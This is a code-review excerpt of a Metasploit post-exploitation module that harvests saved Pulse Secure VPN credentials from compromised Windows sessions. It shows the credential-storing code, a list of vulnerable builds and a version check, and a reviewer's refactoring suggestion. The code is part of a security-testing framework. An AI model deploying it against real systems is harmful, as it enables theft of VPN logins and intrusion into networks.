modules/post/windows/gather/credentials/pulse_secure.rb

```diff
@@ -0,0 +1,369 @@
+            port: uri.port,
+            protocol: 'tcp',
+            realm_key: Metasploit::Model::Realm::Key::WILDCARD,
+            realm_value: uri.path,
+            service_name: 'Pulse Secure SSL VPN',
+            workspace_id: myworkspace_id
+          }
+
+          credential_data = {
+            origin_type: :session,
+            session_id: session_db_id,
+            post_reference_name: refname,
+            username: creds['username'],
+            private_data: creds['password'],
+            private_type: :password
+          }
+
+          credential_core = create_credential(credential_data.merge(service_data))
+
+          login_data = {
+            core: credential_core,
+            access_level: 'User',
+            status: Metasploit::Model::Login::Status::UNTRIED
+          }
+
+          create_credential_login(login_data.merge(service_data))
+        end
+      end
+    else
+      print_error 'No users with configs found. Exiting'
+    end
+  end
+
+  # Array of vulnerable builds branches.
+  def vuln_builds
+    [
+      [Gem::Version.new('0.0.0'), Gem::Version.new('9.0.5')],
+      [Gem::Version.new('9.1.0'), Gem::Version.new('9.1.4')],
+    ]
+  end
+
+  # Check vulnerable state by parsing the build information from
+  # Pulse Connect Secure client version file.
+  #
+  # @return [Msf::Exploit::CheckCode] host vulnerable state
+  #
+  def check
+    version_path = 'C:\\Program Files (x86)\\Pulse Secure\\Pulse\\versionInfo.ini'
+    begin
+      if !session.fs.file.exist?(version_path)
+        print_error("Pulse Secure Connect client is not installed on this system")
+        return Msf::Exploit::CheckCode::NotVulnerable
+      end
+      version_file = session.fs.file.open(version_path) rescue nil
+      if version_file.nil?
+        print_error("Cannot open Pulse Secure Connect version file.")
+        return Msf::Exploit::CheckCode::Unknown
+      end
+      version_data = version_file.read.to_s
+      matches = version_data.scan(/DisplayVersion=([0-9.]*)/m)
+      build = Gem::Version.new(matches[0][0])
+      print_status("Target is running Pulse Secure Connect build #{build}.")
+      if vuln_builds.any? { |build_range| Gem::Version.new(build).between?(*build_range) }
+        print_good("This version is considered vulnerable.")
+        return Msf::Exploit::CheckCode::Vulnerable
+      else
+        if is_system?
+          print_good("You're executing from a privileged process so this version is considered vulnerable.")
+          return Msf::Exploit::CheckCode::Vulnerable
+        else
+          print_warning("You're executing from an unprivileged process so this version is considered safe.")
+          print_warning("However, there might be leftovers from previous versions in the registry.")
+          print_warning("We recommend running this script in elevated mode to obtain credentials saved by recent versions.")
+          return Msf::Exploit::CheckCode::Appears
+        end
+      end
```

Comment:
Redundant `else` after return.

```suggestion
      if vuln_builds.any? { |build_range| Gem::Version.new(build).between?(*build_range) }
        print_good("This version is considered vulnerable.")
        return Msf::Exploit::CheckCode::Vulnerable
      end

      if is_system?
        print_good("You're executing from a privileged process so this version is considered vulnerable.")
        return Msf::Exploit::CheckCode::Vulnerable
      end

      print_warning("You're executing from an unprivileged process so this version is considered safe.")
      print_warning("However, there might be leftovers from previous versions in the registry.")
      print_warning("We recommend running this script in elevated mode to obtain credentials saved by recent versions.")
      return Msf::Exploit::CheckCode::Appears
```